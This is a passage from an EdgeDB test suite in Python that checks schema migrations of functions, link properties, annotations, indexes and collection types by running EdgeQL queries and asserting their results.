default := len(hello06(2) ++ hello06(123))
}
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
{4},
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello06(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
type Base {
property foo -> int64 {
# use the function in default value computation
default := len(hello06(2) ++ hello06(123))
}
}
""")
await self.con.execute(r"""
INSERT Base;
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
{4, 2},
)
async def test_edgeql_migration_eq_function_07(self):
await self.migrate(r"""
function hello07(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
type Base {
# use the function in computable value
property foo := len(hello07(2) ++ hello07(123))
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
{4},
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello07(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
type Base {
# use the function in computable value
property foo := len(hello07(2) ++ hello07(123))
}
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
{2},
)
async def test_edgeql_migration_eq_function_08(self):
await self.migrate(r"""
function hello08(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
# use the function in a alias directly
alias foo := len(hello08(2) ++ hello08(123));
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT foo;""",
{4},
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello08(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
# use the function in a alias directly
alias foo := len(hello08(2) ++ hello08(123));
""")
await self.assert_query_result(
r"""SELECT foo;""",
{2},
)
async def test_edgeql_migration_eq_function_09(self):
await self.migrate(r"""
function hello09(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
type Base;
# use the function in a alias directly
alias BaseAlias := (
SELECT Base {
foo := len(hello09(2) ++ hello09(123))
}
);
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.assert_query_result(
r"""SELECT BaseAlias.foo;""",
{4},
)
# same parameters, different return type (array)
await self.migrate(r"""
function hello09(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
type Base;
# use the function in a alias directly
alias BaseAlias := (
SELECT Base {
foo := len(hello09(2) ++ hello09(123))
}
);
""")
await self.assert_query_result(
r"""SELECT BaseAlias.foo;""",
{2},
)
async def test_edgeql_migration_eq_function_10(self):
await self.migrate(r"""
function hello10(a: int64) -> str
using edgeql $$
SELECT <str>a
$$;
type Base {
required property foo -> int64 {
# use the function in a constraint expression
constraint expression on (len(hello10(__subject__)) < 2)
}
}
""")
await self.con.execute(r"""
SET MODULE test;
""")
with self.assertRaisesRegex(
edgedb.ConstraintViolationError,
r'invalid foo'):
async with self.con.transaction():
await self.con.execute(r"""
INSERT Base {foo := 42};
""")
# same parameters, different return type (array)
await self.migrate(r"""
function hello10(a: int64) -> array<int64>
using edgeql $$
SELECT [a]
$$;
type Base {
required property foo -> int64 {
# use the function in a constraint expression
constraint expression on (len(hello10(__subject__)) < 2)
}
}
""")
# no problem with the constraint now
await self.con.execute(r"""
INSERT Base {foo := 42};
""")
async def test_edgeql_migration_eq_function_11(self):
await self.migrate(r"""
function hello11(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello11(1);""",
['hello1'],
)
await self.migrate(r"""
# replace the function with a new one by the same name
function hello11(a: str) -> str
using edgeql $$
SELECT 'hello' ++ a
$$
""")
await self.assert_query_result(
r"""SELECT hello11(' world');""",
['hello world'],
)
# make sure that the old one is gone
with self.assertRaisesRegex(
edgedb.QueryError,
r'function "hello11\(arg0: std::int64\)" does not exist'):
await self.con.execute(
r"""SELECT hello11(1);"""
)
async def test_edgeql_migration_eq_function_12(self):
await self.migrate(r"""
function hello12(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello12(1);""",
['hello1'],
)
await self.migrate(r"""
function hello12(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$;
# make the function polymorphic
function hello12(a: str) -> str
using edgeql $$
SELECT 'hello' ++ a
$$;
""")
await self.assert_query_result(
r"""SELECT hello12(' world');""",
['hello world'],
)
# make sure that the old one still works
await self.assert_query_result(
r"""SELECT hello12(1);""",
['hello1'],
)
async def test_edgeql_migration_eq_function_13(self):
# this is the inverse of test_edgeql_migration_eq_function_12
await self.migrate(r"""
# start with a polymorphic function
function hello13(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$;
function hello13(a: str) -> str
using edgeql $$
SELECT 'hello' ++ a
$$;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello13(' world');""",
['hello world'],
)
await self.assert_query_result(
r"""SELECT hello13(1);""",
['hello1'],
)
await self.migrate(r"""
# remove one of the 2 versions
function hello13(a: int64) -> str
using edgeql $$
SELECT 'hello' ++ <str>a
$$;
""")
await self.assert_query_result(
r"""SELECT hello13(1);""",
['hello1'],
)
# make sure that the other one is gone
with self.assertRaisesRegex(
edgedb.QueryError,
r'function "hello13\(arg0: std::str\)" does not exist'):
await self.con.execute(
r"""SELECT hello13(' world');"""
)
async def test_edgeql_migration_eq_function_14(self):
await self.migrate(r"""
function hello14(a: str, b: str) -> str
using edgeql $$
SELECT a ++ b
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello14('hello', '14');""",
['hello14'],
)
await self.migrate(r"""
# Replace the function with a new one by the same name,
# but working with arrays.
function hello14(a: array<str>, b: array<str>) -> array<str>
using edgeql $$
SELECT a ++ b
$$
""")
await self.assert_query_result(
r"""SELECT hello14(['hello'], ['14']);""",
[['hello', '14']],
)
# make sure that the old one is gone
with self.assertRaisesRegex(
edgedb.QueryError,
r'function "hello14\(arg0: std::str, arg1: std::str\)" '
r'does not exist'):
await self.assert_query_result(
r"""SELECT hello14('hello', '14');""",
['hello14'],
)
async def test_edgeql_migration_eq_function_15(self):
await self.migrate(r"""
function hello15(a: str, b: str) -> str
using edgeql $$
SELECT a ++ b
$$
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT hello15('hello', '15');""",
['hello15'],
)
await self.migrate(r"""
# Replace the function with a new one by the same name,
# but working with arrays.
function hello15(a: tuple<str, str>) -> str
using edgeql $$
SELECT a.0 ++ a.1
$$
""")
await self.assert_query_result(
r"""SELECT hello15(('hello', '15'));""",
['hello15'],
)
# make sure that the old one is gone
with self.assertRaisesRegex(
edgedb.QueryError,
r'function "hello15\(arg0: std::str, arg1: std::str\)" '
r'does not exist'):
await self.assert_query_result(
r"""SELECT hello15('hello', '15');""",
['hello15'],
)
async def test_edgeql_migration_eq_function_16(self):
# Test prop default and function order of definition. The
# function happens to be shadowing a "std" function. We expect
# that the function `test::to_upper` will actually be used.
#
# See also `test_schema_get_migration_21`
await self.migrate(r"""
type Foo16 {
property name -> str {
default := str_upper('some_name');
};
}
function str_upper(val: str) -> str {
using (SELECT '^^' ++ std::str_upper(val) ++ '^^');
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""SELECT str_upper('hello');""",
['^^HELLO^^'],
)
await self.con.execute("""
INSERT Foo16;
""")
await self.assert_query_result(
r"""SELECT Foo16.name;""",
['^^SOME_NAME^^'],
)
async def test_edgeql_migration_eq_linkprops_01(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child;
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := (INSERT Child)
};
""")
# Migration adding a link property.
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
property bar -> str
}
};
""")
# actually record a link property
await self.con.execute(r"""
UPDATE
Base
SET {
foo := .foo {
@bar := 'lp01'
}
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar }
};
""",
[{'foo': {'@bar': 'lp01'}}],
)
async def test_edgeql_migration_eq_linkprops_02(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
property bar -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {foo := (INSERT Child)};
UPDATE Base
SET {
foo := .foo { @bar := 'lp02' },
};
""")
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
# change the link property name
property bar2 -> str
}
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar2 }
};
""",
[{'foo': {'@bar2': 'lp02'}}],
)
async def test_edgeql_migration_eq_linkprops_03(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
property bar -> int64
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {foo := (INSERT Child)};
UPDATE Base
SET {
foo := .foo { @bar := 3 },
};
""")
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
# change the link property type
property bar -> int32
}
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar }
};
""",
[{'foo': {'@bar': 3}}],
)
async def test_edgeql_migration_eq_linkprops_04(self):
await self.migrate(r"""
type Child;
type Base {
link foo -> Child {
property bar -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {foo := (INSERT Child)};
UPDATE Base
SET {
foo := .foo { @bar := 'lp04' },
};
""")
await self.migrate(r"""
type Child;
type Base {
# change the link cardinality
multi link foo -> Child {
property bar -> str
}
};
""")
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar }
};
""",
[{'foo': [{'@bar': 'lp04'}]}],
)
async def test_edgeql_migration_eq_linkprops_05(self):
await self.migrate(r"""
type Child;
type Base {
multi link foo -> Child {
property bar -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {foo := (INSERT Child)};
UPDATE Base
SET {
foo := .foo { @bar := 'lp05' },
};
""")
await self.migrate(r"""
type Child;
type Base {
# change the link cardinality
link foo -> Child {
property bar -> str
}
};
""", user_input=[
'SELECT .foo LIMIT 1'
])
await self.assert_query_result(
r"""
SELECT Base {
foo: { @bar }
};
""",
[{'foo': {'@bar': 'lp05'}}],
)
async def test_edgeql_migration_eq_linkprops_06(self):
await self.migrate(r"""
type Child;
type Base {
link child -> Child {
property foo -> str;
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {child := (INSERT Child)};
UPDATE Base
SET {
child := .child {
@foo := 'lp06',
},
};
""")
await self.migrate(r"""
type Child;
type Base {
link child -> Child {
property foo -> str;
# add another link prop
property bar -> int64;
}
};
""")
# update the existing data with a new link prop 'bar'
await self.con.execute(r"""
UPDATE Base
SET {
child := .child {
@bar := 111,
@foo := 'lp06',
},
};
""")
await self.assert_query_result(
r"""
SELECT Base {
child: {
@foo,
@bar
}
};
""",
[{
'child': {
'@foo': 'lp06',
'@bar': 111
}
}],
)
async def test_edgeql_migration_eq_linkprops_07(self):
await self.migrate(r"""
type Child;
type Base {
link child -> Child
};
type Derived extending Base {
overloaded link child -> Child {
property foo -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {child := (INSERT Child)};
UPDATE Derived
SET {
child := .child {
@foo := 'lp07',
},
};
""")
await self.migrate(r"""
type Child;
type Base {
# move the link property earlier in the inheritance tree
link child -> Child {
property foo -> str
}
};
type Derived extending Base;
""")
await self.assert_query_result(
r"""
SELECT Base {
child: {
@foo,
}
};
""",
[{
'child': {
'@foo': 'lp07',
}
}],
)
async def test_edgeql_migration_eq_linkprops_08(self):
await self.migrate(r"""
type Child;
type Base {
link child -> Child {
property foo -> str
}
};
type Derived extending Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {child := (INSERT Child)};
""")
await self.con.execute(r"""
UPDATE Derived
SET {
child := .child {
@foo := 'lp08',
},
};
""")
await self.migrate(r"""
type Child;
type Base {
link child -> Child
};
type Derived extending Base {
overloaded link child -> Child {
# move the link property later in the inheritance tree
property foo -> str
}
};
""")
await self.assert_query_result(
r"""
SELECT Derived {
children := count(.child)
};
""",
[{
'children': 1,
}],
)
await self.assert_query_result(
r"""
SELECT Derived {
child: {
@foo,
}
};
""",
[{
'child': {
'@foo': 'lp08',
}
}],
)
async def test_edgeql_migration_eq_linkprops_09(self):
await self.migrate(r"""
type Child;
type Base {
link child -> Child
};
type Derived extending Base {
overloaded link child -> Child {
property foo -> str
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {child := (INSERT Child)};
UPDATE Derived
SET {
child := .child {
@foo := 'lp09',
},
};
""")
await self.migrate(r"""
type Child;
# factor out link property all the way to an abstract link
abstract link base_child {
property foo -> str;
}
type Base {
link child extending base_child -> Child;
};
type Derived extending Base;
""")
await self.assert_query_result(
r"""
SELECT Base {
child: {
@foo,
}
};
""",
[{
'child': {
'@foo': 'lp09',
}
}],
)
async def test_edgeql_migration_eq_linkprops_10(self):
# reverse of the test_edgeql_migration_eq_linkprops_09 refactoring
await self.migrate(r"""
type Child;
abstract link base_child {
property foo -> str;
}
type Base {
link child extending base_child -> Child;
};
type Derived extending Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Derived {child := (INSERT Child)};
UPDATE Derived
SET {
child := .child {
@foo := 'lp10',
},
};
""")
await self.migrate(r"""
type Child;
type Base {
link child -> Child
};
type Derived extending Base {
overloaded link child -> Child {
# move the link property later in the inheritance tree
property foo -> str
}
};
""")
await self.assert_query_result(
r"""
SELECT Derived {
child: {
@foo,
}
};
""",
[{
'child': {
'@foo': 'lp10',
}
}],
)
await self.migrate("")
async def test_edgeql_migration_eq_linkprops_11(self):
# merging a link with the same properties
await self.migrate(r"""
type Thing;
type Owner {
link item -> Thing {
property foo -> str;
}
};
type Renter {
link item -> Thing {
property foo -> str;
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Owner {item := (INSERT Thing)};
UPDATE Owner
SET {
item := .item {
@foo := 'owner_lp11',
},
};
INSERT Renter {item := (INSERT Thing)};
UPDATE Renter
SET {
item := .item {
@foo := 'renter_lp11',
},
};
""")
await self.migrate(r"""
type Thing;
type Base {
link item -> Thing {
property foo -> str;
}
};
type Owner extending Base;
type Renter extending Base;
""")
await self.assert_query_result(
r"""
SELECT Owner {
item: {
@foo,
}
};
""",
[{
'item': {
'@foo': 'owner_lp11',
}
}],
)
await self.assert_query_result(
r"""
SELECT Renter {
item: {
@foo,
}
};
""",
[{
'item': {
'@foo': 'renter_lp11',
}
}],
)
async def test_edgeql_migration_eq_linkprops_12(self):
# merging a link with different properties
await self.migrate(r"""
type Thing;
type Owner {
link item -> Thing {
property foo -> str;
}
};
type Renter {
link item -> Thing {
property bar -> str;
}
};
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Owner {item := (INSERT Thing)};
UPDATE Owner
SET {
item := .item {
@foo := 'owner_lp11',
},
};
INSERT Renter {item := (INSERT Thing)};
UPDATE Renter
SET {
item := .item {
@bar := 'renter_lp11',
},
};
""")
await self.migrate(r"""
type Thing;
type Base {
link item -> Thing {
property foo -> str;
property bar -> str;
}
};
type Owner extending Base;
type Renter extending Base;
""")
await self.assert_query_result(
r"""
SELECT Owner {
item: {
@foo,
@bar,
}
};
""",
[{
'item': {
'@foo': 'owner_lp11',
'@bar': None,
}
}],
)
await self.assert_query_result(
r"""
SELECT Renter {
item: {
@foo,
@bar,
}
};
""",
[{
'item': {
'@foo': None,
'@bar': 'renter_lp11',
}
}],
)
async def test_edgeql_migration_eq_annotation_01(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [],
}],
)
await self.migrate(r"""
type Base {
# add a title annotation
annotation title := 'Base description 01'
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 01'
}],
}],
)
await self.migrate(r"""
# add inheritable and non-inheritable annotations
abstract annotation foo_anno;
abstract inheritable annotation bar_anno;
type Base {
annotation title := 'Base description 01';
annotation foo_anno := 'Base foo_anno 01';
annotation bar_anno := 'Base bar_anno 01';
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 01'
}, {
'name': 'test::bar_anno',
'@value': 'Base bar_anno 01'
}, {
'name': 'test::foo_anno',
'@value': 'Base foo_anno 01'
}],
}],
)
await self.migrate(r"""
abstract annotation foo_anno;
abstract inheritable annotation bar_anno;
type Base {
annotation title := 'Base description 01';
annotation foo_anno := 'Base foo_anno 01';
annotation bar_anno := 'Base bar_anno 01';
}
# extend Base
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 01'
}, {
'name': 'test::bar_anno',
'@value': 'Base bar_anno 01'
}, {
'name': 'test::foo_anno',
'@value': 'Base foo_anno 01'
}],
}, {
'name': 'test::Derived',
'annotations': [{
'name': 'test::bar_anno',
'@value': 'Base bar_anno 01'
}],
}],
)
async def test_edgeql_migration_eq_annotation_02(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [],
}],
)
await self.migrate(r"""
abstract annotation foo_anno;
type Base {
annotation title := 'Base description 02';
annotation foo_anno := 'Base foo_anno 02';
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 02'
}, {
'name': 'test::foo_anno',
'@value': 'Base foo_anno 02'
}],
}, {
'name': 'test::Derived',
# annotation not inherited
'annotations': [],
}],
)
await self.migrate(r"""
# remove foo_anno
type Base {
annotation title := 'Base description 02';
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 02'
}],
}, {
'name': 'test::Derived',
'annotations': [],
}],
)
async def test_edgeql_migration_eq_annotation_03(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [],
}],
)
await self.migrate(r"""
abstract inheritable annotation bar_anno;
type Base {
annotation title := 'Base description 03';
annotation bar_anno := 'Base bar_anno 03';
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 03'
}, {
'name': 'test::bar_anno',
'@value': 'Base bar_anno 03'
}],
}, {
'name': 'test::Derived',
# annotation inherited
'annotations': [{
'name': 'test::bar_anno',
'@value': 'Base bar_anno 03'
}],
}],
)
await self.migrate(r"""
# remove bar_anno
type Base {
annotation title := 'Base description 03';
}
type Derived extending Base;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'std::title',
'@value': 'Base description 03'
}],
}, {
'name': 'test::Derived',
'annotations': [],
}],
)
async def test_edgeql_migration_eq_annotation_04(self):
# Test migration of annotation value and nothing else.
await self.migrate(r"""
abstract annotation description;
type Base {
annotation description := "1";
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'test::description',
'@value': '1',
}],
}],
)
await self.migrate(r"""
abstract annotation description;
type Base {
annotation description := "2";
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
annotations: {
name,
@value
} ORDER BY .name
}
FILTER .name LIKE 'test::%'
ORDER BY .name;
""",
[{
'name': 'test::Base',
'annotations': [{
'name': 'test::description',
'@value': '2',
}],
}],
)
async def test_edgeql_migration_describe_annot_01(self):
await self.migrate('''
abstract annotation foo;
type Base {
annotation foo := "1";
};
''')
await self.con.execute('''
START MIGRATION TO {
module test {
abstract annotation bar;
type Base {
annotation bar := "1";
};
}
};
''')
await self.assert_describe_migration({
'confirmed': [],
'complete': False,
'proposed': {
'statements': [{
'text': (
'ALTER ABSTRACT ANNOTATION test::foo '
'RENAME TO test::bar;'
)
}],
},
})
async def test_edgeql_migration_eq_index_01(self):
await self.con.execute("""
SET MODULE test;
""")
await self.migrate(r"""
type Base {
property name -> str;
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [],
}],
)
await self.migrate(r"""
type Base {
property name -> str;
# an index
index on (.name);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
await self.migrate(r"""
type Base {
# rename the indexed property
property title -> str;
index on (.title);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.title'
}]
}],
)
async def test_edgeql_migration_eq_index_02(self):
await self.migrate(r"""
type Base {
property name -> str;
index on (.name);
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
await self.migrate(r"""
type Base {
property name -> str;
# remove the index
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [],
}],
)
async def test_edgeql_migration_eq_index_03(self):
await self.migrate(r"""
type Base {
property name -> int64;
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [],
}],
)
await self.migrate(r"""
type Base {
property name -> int64;
# an index
index on (.name);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
await self.migrate(r"""
type Base {
# change the indexed property type
property name -> int32;
index on (.name);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
async def test_edgeql_migration_eq_index_04(self):
await self.migrate(r"""
type Base {
property first_name -> str;
property last_name -> str;
property name := .first_name ++ ' ' ++ .last_name;
}
""")
await self.con.execute("""
SET MODULE test;
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [],
}],
)
await self.migrate(r"""
type Base {
property first_name -> str;
property last_name -> str;
property name := .first_name ++ ' ' ++ .last_name;
# an index on a computable
index on (.name);
}
""")
await self.assert_query_result(
r"""
WITH MODULE schema
SELECT ObjectType {
name,
indexes: {
expr
}
}
FILTER .name = 'test::Base';
""",
[{
'name': 'test::Base',
'indexes': [{
'expr': '.name'
}]
}],
)
async def test_edgeql_migration_eq_collections_01(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
property foo -> array<float32>;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
foo := [1.2, 4.5]
};
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[[1.2, 4.5]],
)
async def test_edgeql_migration_eq_collections_02(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
property foo -> tuple<str, int32>;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
foo := ('hello', 42)
};
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[['hello', 42]],
)
async def test_edgeql_migration_eq_collections_03(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
# nested collection
property foo -> tuple<str, int32, array<float32>>;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
foo := ('test', 42, [1.2, 4.5])
};
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[['test', 42, [1.2, 4.5]]],
)
async def test_edgeql_migration_eq_collections_04(self):
await self.migrate(r"""
type Base;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base;
""")
await self.migrate(r"""
type Base {
property foo -> tuple<a: str, b: int32>;
}
""")
await self.con.execute(r"""
UPDATE Base
SET {
foo := (a := 'hello', b := 42)
};
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[{'a': 'hello', 'b': 42}],
)
async def test_edgeql_migration_eq_collections_06(self):
await self.migrate(r"""
type Base {
property foo -> array<int32>;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := [1, 2]
}
""")
# sanity check
await self.assert_query_result(
r"""SELECT Base.foo;""",
[[1, 2]],
)
await self.migrate(r"""
type Base {
property foo -> array<float64>;
}
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[[1.0, 2.0]],
)
async def test_edgeql_migration_eq_collections_07(self):
await self.con.execute("""
SET MODULE test;
""")
await self.migrate(r"""
type Base {
# convert property type to tuple
property bar -> array<str>;
property foo -> tuple<str, int32>;
}
""")
await self.con.execute(r"""
INSERT Base {
bar := ['123'],
foo := ('test', <int32>7),
}
""")
await self.migrate(
r"""
type Base {
property bar -> array<int64>;
property foo -> tuple<str, int32, int32>;
}
""",
user_input=[
"<array<int64>>.bar",
"(.foo.0, .foo.1, 0)",
]
)
await self.assert_query_result(
r"""SELECT Base.bar;""",
[[123]],
)
await self.assert_query_result(
r"""SELECT Base.foo;""",
[['test', 7, 0]],
)
async def test_edgeql_migration_eq_collections_08(self):
await self.migrate(r"""
type Base {
property foo -> tuple<int32, int32>;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := (0, 8)
}
""")
await self.migrate(r"""
type Base {
# convert property type to a tuple with different (but
# cast-compatible) element types
property foo -> tuple<int64, int32>;
}
""")
await self.assert_query_result(
r"""SELECT Base.foo;""",
[[0, 8]],
)
async def test_edgeql_migration_eq_collections_09(self):
await self.migrate(r"""
type Base {
property foo -> tuple<str, int32>;
}
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := ('test', 9)
}
""")
await self.migrate(r"""
type Base {
# convert property type from unnamed to named tuple
property foo -> tuple<a: str, b: int32>;
}
""")
# In theory, since under normal circumstances we can cast an
# unnamed tuple into named, it's reasonable to expect this
# migration to preserve data here.
await self.assert_query_result(
r"""SELECT Base.foo;""",
[{'a': 'test', 'b': 9}],
)
async def test_edgeql_migration_eq_collections_13(self):
await self.migrate(r"""
type Base {
property foo -> float32;
};
# alias that don't have arrays
alias BaseAlias := Base { bar := Base.foo };
alias CollAlias := Base.foo;
""")
await self.con.execute(r"""
SET MODULE test;
INSERT Base {
foo := 13.5,
}
""")
# make sure that the alias initialized correctly
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': 13.5}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[13.5],
)
await self.migrate(r"""
type Base {
property foo -> float32;
};
# "same" alias that now have arrays
alias BaseAlias := Base { bar := [Base.foo] };
alias CollAlias := [Base.foo];
""")
await self.assert_query_result(
r"""SELECT BaseAlias{bar};""",
[{'bar': [13.5]}],
)
await self.assert_query_result(
r"""SELECT CollAlias;""",
[[13.5]],
)
async def test_edgeql_migration_eq_collections_14(self):
await self.migrate(r"""
type Base {
property name -> str;
property foo -> float32;
};
# alias that don't have tuples
alias BaseAlias := Base { bar := Base.foo };
alias CollAlias := Base.foo;
""")
